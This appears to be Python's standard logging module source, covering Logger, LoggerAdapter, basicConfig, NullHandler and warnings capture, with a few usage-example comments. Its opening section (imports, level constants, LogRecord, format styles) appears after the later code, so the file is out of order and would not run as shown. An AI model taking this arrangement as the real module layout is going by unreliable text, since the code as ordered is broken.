raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
self.loggerClass = klass
def setLogRecordFactory(self, factory):
"""
Set the factory to be used when instantiating a log record with this
Manager.
"""
self.logRecordFactory = factory
def _fixupParents(self, alogger):
"""
Ensure that there are either loggers or placeholders all the way
from the specified logger to the root of the logger hierarchy.
"""
name = alogger.name
i = name.rfind(".")
rv = None
while (i > 0) and not rv:
substr = name[:i]
if substr not in self.loggerDict:
self.loggerDict[substr] = PlaceHolder(alogger)
else:
obj = self.loggerDict[substr]
if isinstance(obj, Logger):
rv = obj
else:
assert isinstance(obj, PlaceHolder)
obj.append(alogger)
i = name.rfind(".", 0, i - 1)
if not rv:
rv = self.root
alogger.parent = rv
def _fixupChildren(self, ph, alogger):
"""
Ensure that children of the placeholder ph are connected to the
specified logger.
"""
name = alogger.name
namelen = len(name)
for c in ph.loggerMap.keys():
#The if means ... if not c.parent.name.startswith(nm)
if c.parent.name[:namelen] != name:
alogger.parent = c.parent
c.parent = alogger
def _clear_cache(self):
"""
Clear the cache for all loggers in loggerDict
Called when level changes are made
"""
_acquireLock()
for logger in self.loggerDict.values():
if isinstance(logger, Logger):
logger._cache.clear()
self.root._cache.clear()
_releaseLock()
#---------------------------------------------------------------------------
# Logger classes and functions
#---------------------------------------------------------------------------
class Logger(Filterer):
"""
Instances of the Logger class represent a single logging channel. A
"logging channel" indicates an area of an application. Exactly how an
"area" is defined is up to the application developer. Since an
application can have any number of areas, logging channels are identified
by a unique string. Application areas can be nested (e.g. an area
of "input processing" might include sub-areas "read CSV files", "read
XLS files" and "read Gnumeric files"). To cater for this natural nesting,
channel names are organized into a namespace hierarchy where levels are
separated by periods, much like the Java or Python package namespace. So
in the instance given above, channel names might be "input" for the upper
level, and "input.csv", "input.xls" and "input.gnu" for the sub-levels.
There is no arbitrary limit to the depth of nesting.
"""
def __init__(self, name, level=NOTSET):
"""
Initialize the logger with a name and an optional level.
"""
Filterer.__init__(self)
self.name = name
self.level = _checkLevel(level)
self.parent = None
self.propagate = True
self.handlers = []
self.disabled = False
self._cache = {}
def setLevel(self, level):
"""
Set the logging level of this logger. level must be an int or a str.
"""
self.level = _checkLevel(level)
self.manager._clear_cache()
def debug(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'DEBUG'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.debug("Houston, we have a %s", "thorny problem", exc_info=1)
"""
if self.isEnabledFor(DEBUG):
self._log(DEBUG, msg, args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'INFO'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.info("Houston, we have a %s", "interesting problem", exc_info=1)
"""
if self.isEnabledFor(INFO):
self._log(INFO, msg, args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'WARNING'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.warning("Houston, we have a %s", "bit of a problem", exc_info=1)
"""
if self.isEnabledFor(WARNING):
self._log(WARNING, msg, args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'ERROR'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.error("Houston, we have a %s", "major problem", exc_info=1)
"""
if self.isEnabledFor(ERROR):
self._log(ERROR, msg, args, **kwargs)
def exception(self, msg, *args, exc_info=True, **kwargs):
"""
Convenience method for logging an ERROR with exception information.
"""
self.error(msg, *args, exc_info=exc_info, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'CRITICAL'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.critical("Houston, we have a %s", "major disaster", exc_info=1)
"""
if self.isEnabledFor(CRITICAL):
self._log(CRITICAL, msg, args, **kwargs)
def fatal(self, msg, *args, **kwargs):
"""
Don't use this method, use critical() instead.
"""
self.critical(msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.log(level, "We have a %s", "mysterious problem", exc_info=1)
"""
if not isinstance(level, int):
if raiseExceptions:
raise TypeError("level must be an integer")
else:
return
if self.isEnabledFor(level):
self._log(level, msg, args, **kwargs)
def findCaller(self, stack_info=False, stacklevel=1):
"""
Find the stack frame of the caller so that we can note the source
file name, line number and function name.
"""
f = currentframe()
#On some versions of IronPython, currentframe() returns None if
#IronPython isn't run with -X:Frames.
if f is not None:
f = f.f_back
orig_f = f
while f and stacklevel > 1:
f = f.f_back
stacklevel -= 1
if not f:
f = orig_f
rv = "(unknown file)", 0, "(unknown function)", None
while hasattr(f, "f_code"):
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == _srcfile:
f = f.f_back
continue
sinfo = None
if stack_info:
sio = io.StringIO()
sio.write('Stack (most recent call last):\n')
traceback.print_stack(f, file=sio)
sinfo = sio.getvalue()
if sinfo[-1] == '\n':
sinfo = sinfo[:-1]
sio.close()
rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)
break
return rv
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
"""
A factory method which can be overridden in subclasses to create
specialized LogRecords.
"""
rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func,
sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False,
stacklevel=1):
"""
Low-level logging routine which creates a LogRecord and then calls
all the handlers of this logger to handle the record.
"""
sinfo = None
if _srcfile:
#IronPython doesn't track Python frames, so findCaller raises an
#exception on some versions of IronPython. We trap it here so that
#IronPython can use logging.
try:
fn, lno, func, sinfo = self.findCaller(stack_info, stacklevel)
except ValueError: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if isinstance(exc_info, BaseException):
exc_info = (type(exc_info), exc_info, exc_info.__traceback__)
elif not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
exc_info, func, extra, sinfo)
self.handle(record)
def handle(self, record):
"""
Call the handlers for the specified record.
This method is used for unpickled records received from a socket, as
well as those created locally. Logger-level filtering is applied.
"""
if (not self.disabled) and self.filter(record):
self.callHandlers(record)
def addHandler(self, hdlr):
"""
Add the specified handler to this logger.
"""
_acquireLock()
try:
if not (hdlr in self.handlers):
self.handlers.append(hdlr)
finally:
_releaseLock()
def removeHandler(self, hdlr):
"""
Remove the specified handler from this logger.
"""
_acquireLock()
try:
if hdlr in self.handlers:
self.handlers.remove(hdlr)
finally:
_releaseLock()
def hasHandlers(self):
"""
See if this logger has any handlers configured.
Loop through all handlers for this logger and its parents in the
logger hierarchy. Return True if a handler was found, else False.
Stop searching up the hierarchy whenever a logger with the "propagate"
attribute set to zero is found - that will be the last logger which
is checked for the existence of handlers.
"""
c = self
rv = False
while c:
if c.handlers:
rv = True
break
if not c.propagate:
break
else:
c = c.parent
return rv
def callHandlers(self, record):
"""
Pass a record to all relevant handlers.
Loop through all handlers for this logger and its parents in the
logger hierarchy. If no handler was found, output a one-off error
message to sys.stderr. Stop searching up the hierarchy whenever a
logger with the "propagate" attribute set to zero is found - that
will be the last logger whose handlers are called.
"""
c = self
found = 0
while c:
for hdlr in c.handlers:
found = found + 1
if record.levelno >= hdlr.level:
hdlr.handle(record)
if not c.propagate:
c = None #break out
else:
c = c.parent
if (found == 0):
if lastResort:
if record.levelno >= lastResort.level:
lastResort.handle(record)
elif raiseExceptions and not self.manager.emittedNoHandlerWarning:
sys.stderr.write("No handlers could be found for logger"
" \"%s\"\n" % self.name)
self.manager.emittedNoHandlerWarning = True
def getEffectiveLevel(self):
"""
Get the effective level for this logger.
Loop through this logger and its parents in the logger hierarchy,
looking for a non-zero logging level. Return the first one found.
"""
logger = self
while logger:
if logger.level:
return logger.level
logger = logger.parent
return NOTSET
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.disabled:
return False
try:
return self._cache[level]
except KeyError:
_acquireLock()
try:
if self.manager.disable >= level:
is_enabled = self._cache[level] = False
else:
is_enabled = self._cache[level] = (
level >= self.getEffectiveLevel()
)
finally:
_releaseLock()
return is_enabled
def getChild(self, suffix):
"""
Get a logger which is a descendant to this one.
This is a convenience method, such that
logging.getLogger('abc').getChild('def.ghi')
is the same as
logging.getLogger('abc.def.ghi')
It's useful, for example, when the parent logger is named using
__name__ rather than a literal string.
"""
if self.root is not self:
suffix = '.'.join((self.name, suffix))
return self.manager.getLogger(suffix)
def __repr__(self):
level = getLevelName(self.getEffectiveLevel())
return '<%s %s (%s)>' % (self.__class__.__name__, self.name, level)
def __reduce__(self):
# In general, only the root logger will not be accessible via its name.
# However, the root logger's class has its own __reduce__ method.
if getLogger(self.name) is not self:
import pickle
raise pickle.PicklingError('logger cannot be pickled')
return getLogger, (self.name,)
class RootLogger(Logger):
"""
A root logger is not that different to any other logger, except that
it must have a logging level and there is only one instance of it in
the hierarchy.
"""
def __init__(self, level):
"""
Initialize the logger with the name "root".
"""
Logger.__init__(self, "root", level)
def __reduce__(self):
return getLogger, ()
_loggerClass = Logger
class LoggerAdapter(object):
"""
An adapter for loggers which makes it easier to specify contextual
information in logging output.
"""
def __init__(self, logger, extra=None):
"""
Initialize the adapter with a logger and a dict-like object which
provides contextual information. This constructor signature allows
easy stacking of LoggerAdapters, if so desired.
You can effectively pass keyword arguments as shown in the
following example:
adapter = LoggerAdapter(someLogger, dict(p1=v1, p2="v2"))
"""
self.logger = logger
self.extra = extra
def process(self, msg, kwargs):
"""
Process the logging message and keyword arguments passed in to
a logging call to insert contextual information. You can either
manipulate the message itself, the keyword args or both. Return
the message and kwargs modified (or not) to suit your needs.
Normally, you'll only need to override this one method in a
LoggerAdapter subclass for your specific needs.
"""
kwargs["extra"] = self.extra
return msg, kwargs
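#
# Example (minimal sketch): overriding process() lets an adapter rewrite the
# message instead of (or as well as) injecting 'extra'. 'RequestAdapter' and
# 'request_id' are hypothetical names.
#
#   >>> import logging
#   >>> class RequestAdapter(logging.LoggerAdapter):
#   ...     def process(self, msg, kwargs):
#   ...         return '[%s] %s' % (self.extra['request_id'], msg), kwargs
#   >>> log = RequestAdapter(logging.getLogger('web'), {'request_id': 'abc123'})
#   >>> log.warning('slow response')   # emits "[abc123] slow response"
#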
#
# Boilerplate convenience methods
#
def debug(self, msg, *args, **kwargs):
"""
Delegate a debug call to the underlying logger.
"""
self.log(DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Delegate an info call to the underlying logger.
"""
self.log(INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Delegate a warning call to the underlying logger.
"""
self.log(WARNING, msg, *args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Delegate an error call to the underlying logger.
"""
self.log(ERROR, msg, *args, **kwargs)
def exception(self, msg, *args, exc_info=True, **kwargs):
"""
Delegate an exception call to the underlying logger.
"""
self.log(ERROR, msg, *args, exc_info=exc_info, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Delegate a critical call to the underlying logger.
"""
self.log(CRITICAL, msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
Delegate a log call to the underlying logger, after adding
contextual information from this adapter instance.
"""
if self.isEnabledFor(level):
msg, kwargs = self.process(msg, kwargs)
self.logger.log(level, msg, *args, **kwargs)
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
return self.logger.isEnabledFor(level)
def setLevel(self, level):
"""
Set the specified level on the underlying logger.
"""
self.logger.setLevel(level)
def getEffectiveLevel(self):
"""
Get the effective level for the underlying logger.
"""
return self.logger.getEffectiveLevel()
def hasHandlers(self):
"""
See if the underlying logger has any handlers.
"""
return self.logger.hasHandlers()
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):
"""
Low-level log implementation, proxied to allow nested logger adapters.
"""
return self.logger._log(
level,
msg,
args,
exc_info=exc_info,
extra=extra,
stack_info=stack_info,
)
@property
def manager(self):
return self.logger.manager
@manager.setter
def manager(self, value):
self.logger.manager = value
@property
def name(self):
return self.logger.name
def __repr__(self):
logger = self.logger
level = getLevelName(logger.getEffectiveLevel())
return '<%s %s (%s)>' % (self.__class__.__name__, logger.name, level)
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
def basicConfig(**kwargs):
"""
Do basic configuration for the logging system.
This function does nothing if the root logger already has handlers
configured, unless the keyword argument *force* is set to ``True``.
It is a convenience method intended for use by simple scripts
to do one-shot configuration of the logging package.
The default behaviour is to create a StreamHandler which writes to
sys.stderr, set a formatter using the BASIC_FORMAT format string, and
add the handler to the root logger.
A number of optional keyword arguments may be specified, which can alter
the default behaviour.
filename Specifies that a FileHandler be created, using the specified
filename, rather than a StreamHandler.
filemode Specifies the mode to open the file, if filename is specified
(if filemode is unspecified, it defaults to 'a').
format Use the specified format string for the handler.
datefmt Use the specified date/time format.
style If a format string is specified, use this to specify the
type of format string (possible values '%', '{', '$', for
%-formatting, :meth:`str.format` and :class:`string.Template`
- defaults to '%').
level Set the root logger level to the specified level.
stream Use the specified stream to initialize the StreamHandler. Note
that this argument is incompatible with 'filename' - if both
are present, 'stream' is ignored.
handlers If specified, this should be an iterable of already created
handlers, which will be added to the root handler. Any handler
in the list which does not have a formatter assigned will be
assigned the formatter created in this function.
force If this keyword is specified as true, any existing handlers
attached to the root logger are removed and closed, before
carrying out the configuration as specified by the other
arguments.
encoding If specified together with a filename, this encoding is passed to
the created FileHandler, causing it to be used when the file is
opened.
errors If specified together with a filename, this value is passed to the
created FileHandler, causing it to be used when the file is
opened in text mode. If not specified, the default value is
`backslashreplace`.
Note that you could specify a stream created using open(filename, mode)
rather than passing the filename and mode in. However, it should be
remembered that StreamHandler does not close its stream (since it may be
using sys.stdout or sys.stderr), whereas FileHandler closes its stream
when the handler is closed.
.. versionchanged:: 3.2
Added the ``style`` parameter.
.. versionchanged:: 3.3
Added the ``handlers`` parameter. A ``ValueError`` is now thrown for
incompatible arguments (e.g. ``handlers`` specified together with
``filename``/``filemode``, or ``filename``/``filemode`` specified
together with ``stream``, or ``handlers`` specified together with
``stream``).
.. versionchanged:: 3.8
Added the ``force`` parameter.
.. versionchanged:: 3.9
Added the ``encoding`` and ``errors`` parameters.
"""
# Add thread safety in case someone mistakenly calls
# basicConfig() from multiple threads
_acquireLock()
try:
force = kwargs.pop('force', False)
encoding = kwargs.pop('encoding', None)
errors = kwargs.pop('errors', 'backslashreplace')
if force:
for h in root.handlers[:]:
root.removeHandler(h)
h.close()
if len(root.handlers) == 0:
handlers = kwargs.pop("handlers", None)
if handlers is None:
if "stream" in kwargs and "filename" in kwargs:
raise ValueError("'stream' and 'filename' should not be "
"specified together")
else:
if "stream" in kwargs or "filename" in kwargs:
raise ValueError("'stream' or 'filename' should not be "
"specified together with 'handlers'")
if handlers is None:
filename = kwargs.pop("filename", None)
mode = kwargs.pop("filemode", 'a')
if filename:
if 'b' in mode:
errors = None
h = FileHandler(filename, mode,
encoding=encoding, errors=errors)
else:
stream = kwargs.pop("stream", None)
h = StreamHandler(stream)
handlers = [h]
dfs = kwargs.pop("datefmt", None)
style = kwargs.pop("style", '%')
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
fs = kwargs.pop("format", _STYLES[style][1])
fmt = Formatter(fs, dfs, style)
for h in handlers:
if h.formatter is None:
h.setFormatter(fmt)
root.addHandler(h)
level = kwargs.pop("level", None)
if level is not None:
root.setLevel(level)
if kwargs:
keys = ', '.join(kwargs.keys())
raise ValueError('Unrecognised argument(s): %s' % keys)
finally:
_releaseLock()
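#
# Example (minimal sketch): one-shot configuration for a script. 'debug.log'
# is a hypothetical filename; force=True (3.8+) first removes any handlers
# already attached to the root logger.
#
#   >>> import logging
#   >>> logging.basicConfig(filename='debug.log', filemode='w',
#   ...                     level=logging.DEBUG,
#   ...                     format='%(asctime)s %(levelname)s %(message)s',
#   ...                     force=True)
#   >>> logging.debug('written to debug.log')
#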
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
"""
Return a logger with the specified name, creating it if necessary.
If no name is specified, return the root logger.
"""
if not name or isinstance(name, str) and name == root.name:
return root
return Logger.manager.getLogger(name)
def critical(msg, *args, **kwargs):
"""
Log a message with severity 'CRITICAL' on the root logger. If the logger
has no handlers, call basicConfig() to add a console handler with a
pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.critical(msg, *args, **kwargs)
def fatal(msg, *args, **kwargs):
"""
Don't use this function, use critical() instead.
"""
critical(msg, *args, **kwargs)
def error(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.error(msg, *args, **kwargs)
def exception(msg, *args, exc_info=True, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger, with exception
information. If the logger has no handlers, basicConfig() is called to add
a console handler with a pre-defined format.
"""
error(msg, *args, exc_info=exc_info, **kwargs)
def warning(msg, *args, **kwargs):
"""
Log a message with severity 'WARNING' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.warning(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
warnings.warn("The 'warn' function is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
warning(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
"""
Log a message with severity 'INFO' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
"""
Log a message with severity 'DEBUG' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level' on the root logger. If
the logger has no handlers, call basicConfig() to add a console handler
with a pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.log(level, msg, *args, **kwargs)
def disable(level=CRITICAL):
"""
Disable all logging calls of severity 'level' and below.
"""
root.manager.disable = level
root.manager._clear_cache()
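#
# Example (minimal sketch): disable() imposes a hierarchy-wide floor; records
# at that severity or below are dropped regardless of individual logger
# levels, and disable(NOTSET) lifts the restriction.
#
#   >>> import logging
#   >>> logging.disable(logging.INFO)    # DEBUG and INFO now suppressed
#   >>> logging.disable(logging.NOTSET)  # back to normal
#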
def shutdown(handlerList=_handlerList):
"""
Perform any cleanup actions in the logging system (e.g. flushing
buffers).
Should be called at application exit.
"""
for wr in reversed(handlerList[:]):
#errors might occur, for example, if files are locked
#we just ignore them if raiseExceptions is not set
try:
h = wr()
if h:
try:
h.acquire()
h.flush()
h.close()
except (OSError, ValueError):
# Ignore errors which might be caused
# because handlers have been closed but
# references to them are still around at
# application exit.
pass
finally:
h.release()
except: # ignore everything, as we're shutting down
if raiseExceptions:
raise
#else, swallow
#Let's try and shutdown automatically on application exit...
import atexit
atexit.register(shutdown)
# Null handler
class NullHandler(Handler):
"""
This handler does nothing. It's intended to be used to avoid the
"No handlers could be found for logger XXX" one-off warning. This is
important for library code, which may contain code to log events. If a user
of the library does not configure logging, the one-off warning might be
produced; to avoid this, the library developer simply needs to instantiate
a NullHandler and add it to the top-level logger of the library module or
package.
"""
def handle(self, record):
"""Stub."""
def emit(self, record):
"""Stub."""
def createLock(self):
self.lock = None
def _at_fork_reinit(self):
pass
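#
# Example (minimal sketch): the recommended pattern for library code.
# 'mylib' is a hypothetical package name.
#
#   >>> import logging
#   >>> logging.getLogger('mylib').addHandler(logging.NullHandler())
#
# The library may then log freely; nothing reaches the console unless the
# application installs handlers of its own.
#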
# Warnings integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
"""
Implementation of showwarning which redirects to logging. It will first
check to see if the file parameter is None. If a file is specified, it will
delegate to the original warnings implementation of showwarning. Otherwise,
it will call warnings.formatwarning and will log the resulting string to a
warnings logger named "py.warnings" with level logging.WARNING.
"""
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(message, category, filename, lineno, line)
logger = getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
"""
If capture is true, redirect all warnings to the logging package.
If capture is False, ensure that warnings are not redirected to logging
but to their original destinations.
"""
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
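#
# Example (minimal sketch): once captured, warnings are routed through the
# "py.warnings" logger and can be filtered or formatted like any record.
#
#   >>> import logging, warnings
#   >>> logging.captureWarnings(True)
#   >>> warnings.warn('deprecated API')    # handled by logging, not stderr
#   >>> logging.captureWarnings(False)     # restores warnings.showwarning
#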
import sys, os, time, io, re, traceback, warnings, weakref, collections.abc
from string import Template
from string import Formatter as StrFormatter
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'shutdown',
'warn', 'warning', 'getLogRecordFactory', 'setLogRecordFactory',
'lastResort', 'raiseExceptions']
import threading
__author__ = "Vinay Sajip <vinay_sajip@red-dove.com>"
__status__ = "production"
__version__ = "0.5.1.2"
__date__ = "07 February 2010"
_startTime = time.time()
raiseExceptions = True
#
# If you don't want threading information in the log, set this to zero
#
logThreads = True
#
# If you don't want multiprocessing information in the log, set this to zero
#
logMultiprocessing = True
#
# If you don't want process information in the log, set this to zero
#
logProcesses = True
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
_levelToName = {
CRITICAL: 'CRITICAL',
ERROR: 'ERROR',
WARNING: 'WARNING',
INFO: 'INFO',
DEBUG: 'DEBUG',
NOTSET: 'NOTSET',
}
_nameToLevel = {
'CRITICAL': CRITICAL,
'FATAL': FATAL,
'ERROR': ERROR,
'WARN': WARNING,
'WARNING': WARNING,
'INFO': INFO,
'DEBUG': DEBUG,
'NOTSET': NOTSET,
}
def getLevelName(level):
# See Issues #22386, #27937 and #29220 for why it's this way
result = _levelToName.get(level)
if result is not None:
return result
result = _nameToLevel.get(level)
if result is not None:
return result
return "Level %s" % level
def addLevelName(level, levelName):
_acquireLock()
try:
_levelToName[level] = levelName
_nameToLevel[levelName] = level
finally:
_releaseLock()
if hasattr(sys, '_getframe'):
currentframe = lambda: sys._getframe(3)
else:
def currentframe():
"""Return the frame object for the caller's stack frame."""
try:
raise Exception
except Exception:
return sys.exc_info()[2].tb_frame.f_back
#
# _srcfile is used when walking the stack to check when we've got the first
# caller stack frame, by skipping frames whose filename is that of this
# module's source. It therefore should contain the filename of this module's
# source file.
#
# Ordinarily we would use __file__ for this, but frozen modules don't always
# have __file__ set, for some reason (see Issue #21736). Thus, we get the
# filename from a handy code object from a function defined in this module.
# (There's no particular reason for picking addLevelName.)
_srcfile = os.path.normcase(addLevelName.__code__.co_filename)
def _checkLevel(level):
if isinstance(level, int):
rv = level
elif str(level) == level:
if level not in _nameToLevel:
raise ValueError("Unknown level: %r" % level)
rv = _nameToLevel[level]
else:
raise TypeError("Level not an integer or a valid string: %r" % level)
return rv
_lock = threading.RLock()
def _acquireLock():
if _lock:
_lock.acquire()
def _releaseLock():
if _lock:
_lock.release()
if not hasattr(os, 'register_at_fork'):
def _register_at_fork_reinit_lock(instance):
pass
else:
_at_fork_reinit_lock_weakset = weakref.WeakSet()
def _register_at_fork_reinit_lock(instance):
_acquireLock()
try:
_at_fork_reinit_lock_weakset.add(instance)
finally:
_releaseLock()
def _after_at_fork_child_reinit_locks():
for handler in _at_fork_reinit_lock_weakset:
handler._at_fork_reinit()
_lock._at_fork_reinit()
os.register_at_fork(before=_acquireLock,
after_in_child=_after_at_fork_child_reinit_locks,
after_in_parent=_releaseLock)
class LogRecord(object):
def __init__(self, name, level, pathname, lineno,
msg, args, exc_info, func=None, sinfo=None, **kwargs):
ct = time.time()
self.name = name
self.msg = msg
if (args and len(args) == 1 and isinstance(args[0], collections.abc.Mapping)
and args[0]):
args = args[0]
self.args = args
self.levelname = getLevelName(level)
self.levelno = level
self.pathname = pathname
try:
self.filename = os.path.basename(pathname)
self.module = os.path.splitext(self.filename)[0]
except (TypeError, ValueError, AttributeError):
self.filename = pathname
self.module = "Unknown module"
self.exc_info = exc_info
self.exc_text = None
self.stack_info = sinfo
self.lineno = lineno
self.funcName = func
self.created = ct
self.msecs = (ct - int(ct)) * 1000
self.relativeCreated = (self.created - _startTime) * 1000
if logThreads:
self.thread = threading.get_ident()
self.threadName = threading.current_thread().name
else:
self.thread = None
self.threadName = None
if not logMultiprocessing:
self.processName = None
else:
self.processName = 'MainProcess'
mp = sys.modules.get('multiprocessing')
if mp is not None:
try:
self.processName = mp.current_process().name
except Exception:
pass
if logProcesses and hasattr(os, 'getpid'):
self.process = os.getpid()
else:
self.process = None
def __repr__(self):
return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
self.pathname, self.lineno, self.msg)
def getMessage(self):
msg = str(self.msg)
if self.args:
msg = msg % self.args
return msg
_logRecordFactory = LogRecord
def setLogRecordFactory(factory):
global _logRecordFactory
_logRecordFactory = factory
def getLogRecordFactory():
return _logRecordFactory
def makeLogRecord(dict):
rv = _logRecordFactory(None, None, "", 0, "", (), None, None)
rv.__dict__.update(dict)
return rv
_str_formatter = StrFormatter()
del StrFormatter
class PercentStyle(object):
default_format = '%(message)s'
asctime_format = '%(asctime)s'
asctime_search = '%(asctime)'
validation_pattern = re.compile(r'%\(\w+\)[#0+ -]*(\*|\d+)?(\.(\*|\d+))?[diouxefgcrsa%]', re.I)
def __init__(self, fmt):
self._fmt = fmt or self.default_format
def usesTime(self):
return self._fmt.find(self.asctime_search) >= 0
def validate(self):
if not self.validation_pattern.search(self._fmt):
raise ValueError("Invalid format '%s' for '%s' style" % (self._fmt, self.default_format[0]))
def _format(self, record):
return self._fmt % record.__dict__
def format(self, record):
try:
return self._format(record)
except KeyError as e:
raise ValueError('Formatting field not found in record: %s' % e)
class StrFormatStyle(PercentStyle):
default_format = '{message}'
asctime_format = '{asctime}'
asctime_search = '{asctime'
fmt_spec = re.compile(r'^(.?[<>=^])?[+ -]?#?0?(\d+|{\w+})?[,_]?(\.(\d+|{\w+}))?[bcdefgnosx%]?$', re.I)
field_spec = re.compile(r'^(\d+|\w+)(\.\w+|\[[^]]+\])*$')
def _format(self, record):
return self._fmt.format(**record.__dict__)
def validate(self):
fields = set()
try:
for _, fieldname, spec, conversion in _str_formatter.parse(self._fmt):
if fieldname:
if not self.field_spec.match(fieldname):
raise ValueError('invalid field name/expression: %r' % fieldname)
fields.add(fieldname)
if conversion and conversion not in 'rsa':
raise ValueError('invalid conversion: %r' % conversion)
if spec and not self.fmt_spec.match(spec):
raise ValueError('bad specifier: %r' % spec)
except ValueError as e:
raise ValueError('invalid format: %s' % e)
if not fields:
raise ValueError('invalid format: no fields')
class StringTemplateStyle(PercentStyle):
default_format = '${message}'
asctime_format = '${asctime}'
asctime_search = '${asctime}'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
self._tpl = Template(self._fmt)
def usesTime(self):
fmt = self._fmt
return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0
def validate(self):
pattern = Template.pattern
fields = set()
for m in pattern.finditer(self._fmt):
d = m.groupdict()
if d['named']:
fields.add(d['named'])
elif d['braced']:
fields.add(d['braced'])
elif m.group(0) == '$':
raise ValueError('invalid format: bare \'$\' not allowed')
if not fields:
raise ValueError('invalid format: no fields')
def _format(self, record):
return self._tpl.substitute(**record.__dict__)
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
_STYLES = {
'%': (PercentStyle, BASIC_FORMAT),
'{': (StrFormatStyle, '{levelname}:{name}:{message}'),
'$': (StringTemplateStyle, '${levelname}:${name}:${message}'),
}
class Formatter(object):
converter = time.localtime
def __init__(self, fmt=None, datefmt=None, style='%', validate=True):
if style not in _STYLES:
